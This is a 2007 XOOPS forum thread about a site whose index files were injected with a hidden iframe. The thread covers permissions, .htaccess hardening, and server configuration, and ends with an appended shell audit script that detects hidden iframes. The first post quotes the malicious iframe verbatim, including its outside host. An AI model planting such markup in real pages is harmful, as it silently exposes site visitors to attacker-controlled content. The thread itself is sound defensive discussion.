1
MadFish
Hacked - how to stop index files being overwritten?
  • 2007/2/1 4:25

  • MadFish

  • Friend of XOOPS

  • Posts: 1056

  • Since: 2003/9/27


This morning we found the following code embedded in all of our index.htm/php files:

<IFRAME name='StatPage' src='http://www.kusik-tusik-trf.com/trf/traf.php' width=5 height=5 style='display:none'></IFRAME></div>


I don't know what this does, but I'm guessing that the hacker is gathering information about servers that they have busted into. I looked up the domain, and it is registered on a Russian registrar. I've written to the "owner", but naturally I don't expect a response.

Is there a reliable way to prevent index files from being overwritten? We've had a string of problems with our site lately and the boss is ready to shoot someone (i.e. me).

Also, is this likely to be an issue with the way the server is configured, or that my site is configured?

Thanks.

PS: Yes I have Protector!

2
JMorris
Re: Hacked - how to stop index files being overwritten?
  • 2007/2/1 5:30

  • JMorris

  • XOOPS is my life!

  • Posts: 2722

  • Since: 2004/4/11


Protector will only help you if your web hosting provider has configured their server correctly. So, yes this is most likely a server configuration issue.

In a nutshell, once a hacker has shell access to the server your site is hosted on, there is virtually nothing you can do to stop them. HOWEVER, there are some precautions you can take to help prevent hackers from gaining access.

First and foremost, make sure you use the most restrictive file and folder permissions possible. See "My site has been hacked! What do I do?" for more information. Personally, I'm p@r@n0!d, so I use even more restrictive permissions, but my hosting environment allows such a configuration; most don't.

Most hosting environments support some basic form of overriding the default Apache configuration using .htaccess files. Here is a sample .htaccess file I use on my sites that does some pretty basic stuff that can help protect your site.
Options All -Indexes
RewriteEngine on
RewriteCond %{HTTP_HOST} !^pkbcs\.com$
RewriteRule ^(.*)$ http://pkbcs.com/$1 [L,R=301]
ErrorDocument 400 http://pkbcs.com/
ErrorDocument 401 http://pkbcs.com/
ErrorDocument 402 http://pkbcs.com/
ErrorDocument 403 http://pkbcs.com/
ErrorDocument 404 http://pkbcs.com/
ErrorDocument 405 http://pkbcs.com/
ErrorDocument 406 http://pkbcs.com/
ErrorDocument 407 http://pkbcs.com/
ErrorDocument 408 http://pkbcs.com/
ErrorDocument 409 http://pkbcs.com/
ErrorDocument 410 http://pkbcs.com/
ErrorDocument 411 http://pkbcs.com/
ErrorDocument 412 http://pkbcs.com/
ErrorDocument 413 http://pkbcs.com/
ErrorDocument 414 http://pkbcs.com/
ErrorDocument 415 http://pkbcs.com/
ErrorDocument 500 http://pkbcs.com/
ErrorDocument 501 http://pkbcs.com/
ErrorDocument 502 http://pkbcs.com/
ErrorDocument 503 http://pkbcs.com/
ErrorDocument 504 http://pkbcs.com/
ErrorDocument 505 http://pkbcs.com/

One of the most basic precautions you can take to protect your site is to follow the directions given when installing your site. In other words, make sure that the install directory is deleted after install. Also, make sure that mainfile.php is not writeable.

Another basic security principle is to make sure you always use strong passwords. Strong passwords usually consist of at least 7 characters including numbers, lower-case letters, upper-case letters, and special symbols (like !@#$%&?).

To be quite blunt, there is absolutely no way of guaranteeing security on your website; however, educating yourself about basic security principles and implementing the “best practices” will go a long way towards fighting off the jerks who want to hack your site.

Hope that helps,

James
Insanity can be defined as "doing the same thing over and over and expecting different results."

Stupidity is not a crime. Therefore, you are free to go.

3
MadFish
Re: Hacked - how to stop index files being overwritten?
  • 2007/2/1 8:03

  • MadFish

  • Friend of XOOPS

  • Posts: 1056

  • Since: 2003/9/27


Thanks James

We're compliant with the FAQ, but don't have an equivalent rewrite rule. What does it actually do?

I'm pretty sure the server is affected now as I can see the same dodgy URL flashing up a few times when I load pages in cPanel.

We reported the problem and restored our site from backup, so it's online and 'uninfected' again, but probably not for long if our hosting company can't close the hole(s).

4
wizanda
Re: Hacked - how to stop index files being overwritten?
  • 2007/2/1 9:16

  • wizanda

  • Home away from home

  • Posts: 1585

  • Since: 2004/3/21


Protector doesn't work!!

Sorry, I did post this when it happened to me, yet no one noticed, and maybe I should have been more clear for all....


Index.php of XOOPS must also be made 444 chmod as to only be accessible by the server and not writable.

That then fixes this security issue; yet there is one even with Protector, as the same happened to me and I then added Protector, yet it still occurred.

5
JMorris
Re: Hacked - how to stop index files being overwritten?
  • 2007/2/1 13:44

  • JMorris

  • XOOPS is my life!

  • Posts: 2722

  • Since: 2004/4/11


RE: Protector....

Protector does work, but it cannot stop someone if they have shell access on the server. Nothing but a properly configured server can stop hackers once they have shell access.

RE: .htaccess...

Options All -Indexes
^^Turns off fancy indexing. That way, if a directory is called that doesn't have an index.html/php file, the server will generate a 400 error

RewriteEngine on
^^Turns on the rewrite engine

RewriteCond %{HTTP_HOST} !^pkbcs\.com$
RewriteRule ^(.*)$ http://pkbcs.com/$1 [L,R=301]
^^Only provides SEO by keeping your URI consistent in the search engines

ErrorDocument 400 http://pkbcs.com/
ErrorDocument 401 http://pkbcs.com/
ErrorDocument 402 http://pkbcs.com/
ErrorDocument 403 http://pkbcs.com/
ErrorDocument 404 http://pkbcs.com/
ErrorDocument 405 http://pkbcs.com/
ErrorDocument 406 http://pkbcs.com/
ErrorDocument 407 http://pkbcs.com/
ErrorDocument 408 http://pkbcs.com/
ErrorDocument 409 http://pkbcs.com/
ErrorDocument 410 http://pkbcs.com/
ErrorDocument 411 http://pkbcs.com/
ErrorDocument 412 http://pkbcs.com/
ErrorDocument 413 http://pkbcs.com/
ErrorDocument 414 http://pkbcs.com/
ErrorDocument 415 http://pkbcs.com/
ErrorDocument 500 http://pkbcs.com/
ErrorDocument 501 http://pkbcs.com/
ErrorDocument 502 http://pkbcs.com/
ErrorDocument 503 http://pkbcs.com/
ErrorDocument 504 http://pkbcs.com/
ErrorDocument 505 http://pkbcs.com/
^^Redirects the browser to your homepage in the event of any of the above errors. This works with the Options All -Indexes line.

The .htaccess file isn't that comprehensive. If you do a little research on it, you can deny access to specific folders from a browser and a few more tricks to tighten down your site. Keep in mind though, these are only useful for web browsers. If the user has shell access, it won't do any good.

Also, I would suggest getting very familiar with chmod settings. Oftentimes, you can go much stricter on the file/folder permissions than XOOPS documentation suggests, but you have to experiment and see what your hosting environment will support.

HTH.

James

6
vaughan
Re: Hacked - how to stop index files being overwritten?
  • 2007/2/1 15:05

  • vaughan

  • Friend of XOOPS

  • Posts: 680

  • Since: 2005/11/26


Sometimes they can do this without shell access if folder chmod settings are 777 (quite a common problem, I'm afraid).

The best way is to run PHP with phpsuexec in CGI mode & make sure that user accounts on the server run under the user account instead of user = nobody.

In phpsuexec mode, you can set folders to say 755, which prevents this kind of thing happening. But as James says, it's definitely 1 for the host to take on board.

You could also try changing the index.htm files to read only.. php 444 etc..
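
Added example (not written by any poster in this thread and not XOOPS tooling): a POSIX shell audit of a web root for the points raised in the replies above, namely world-writable (777) paths, index files and mainfile.php that still carry a write bit, a leftover install directory, and index files containing a hidden iframe shaped like the one in the first post. The function names and the iframe heuristic are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not XOOPS tooling): audit a web root for the weaknesses
# discussed in this thread. The web-root path is supplied by the caller.

# Files and directories writable by every local account (mode 777/666 etc.).
world_writable() {
    find "$1" ! -type l -perm -0002 -print | sort
}

# index.* and mainfile.php that still carry any write bit (thread advice: 444).
writable_core_files() {
    find "$1" -type f \
        \( -name 'index.htm' -o -name 'index.html' -o -name 'index.php' \
           -o -name 'mainfile.php' \) \
        \( -perm -0200 -o -perm -0020 -o -perm -0002 \) -print | sort
}

# Index files containing an iframe that is hidden (display:none) or only a
# few pixels in size. This is a heuristic, so review each hit by hand.
hidden_iframes() {
    find "$1" -type f \
        \( -name 'index.htm' -o -name 'index.html' -o -name 'index.php' \) \
        -exec grep -liE \
        '<iframe[^>]*(display:[[:space:]]*none|(width|height)=.?[0-9][^0-9])' {} + | sort
}

# Print every finding prefixed with the check that produced it.
# Returns 1 if anything was found, 0 if the tree is clean.
audit() {
    found=0
    [ -d "$1/install" ] && { echo "install_dir_present $1/install"; found=1; }
    for check in world_writable writable_core_files hidden_iframes; do
        out=$($check "$1")
        [ -n "$out" ] || continue
        echo "$out" | sed "s|^|$check |"
        found=1
    done
    return $found
}

# Stand-alone use: sh audit.sh /path/to/webroot
if [ -n "${1:-}" ]; then audit "$1"; fi
```

Run from cron against a restored site, a non-zero exit status flags a re-infection or a permission that has drifted back; as the replies note, it does not stop someone who already has shell access on the server.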
